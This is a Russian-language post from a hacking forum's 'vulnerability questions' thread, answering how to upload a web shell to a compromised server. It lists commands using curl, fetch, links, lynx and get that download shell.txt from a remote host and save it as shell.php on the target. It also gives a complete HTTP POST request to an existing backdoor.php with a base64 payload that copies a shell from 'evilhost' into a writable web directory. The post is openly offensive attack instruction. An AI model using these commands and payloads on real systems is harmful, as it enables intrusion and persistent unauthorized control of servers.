Ваши вопросы по уязвимостям.

#11

03.03.2011, 16:50

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

С нами: 8772211

Репутация: 56

Цитата:

Сообщение от noviyuser

какие еще команды есть напободие wget?

curl, fetch, links, lynx, get

Проверить наличие качалок можно команой which.

В консоли: which curl, если качалка установлена, то в ответ получишь /usr/bin/curl (полный путь к исполняемому файлу на сервере)

Синтаксис:

get -o /path/shell.php http://site.com/shell.txt

fetch -o /path/shell.php http://site.com/shell.txt

curl --output /path/shell.php http://site.com/shell.txt

links -source http://site.com/shell.txt > /path/shell.php

lynx -source http://site.com/shell.txt > /path/shell.php

Цитата:

Сообщение от None

можно ли этой командой залить полноценный шелл? можно примерчик?

Можно, зависит от настроек php.

Пример для allow_url_fopen = on (ну и функция copy разумеется не должна находиться в disable functions)

Посылаешь пакет:

Код HTML:

POST http://site.com/backdoor.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Keep-Alive: 115
Connection: keep-alive

e=Y29weSgnaHR0cDovL2V2aWxob3N0L3NoZWxsLnR4dCcsJy9zaXRlL3d3dy9zaGVsbC5waHAnKTs

где e=copy('http://evilhost/shell.txt','/site/www/shell.php'); в base64_encode

http://evilhost/shell.txt - откуда льем

/site/www/shell.php - куда (абсолютный путь до папки доступной на запись)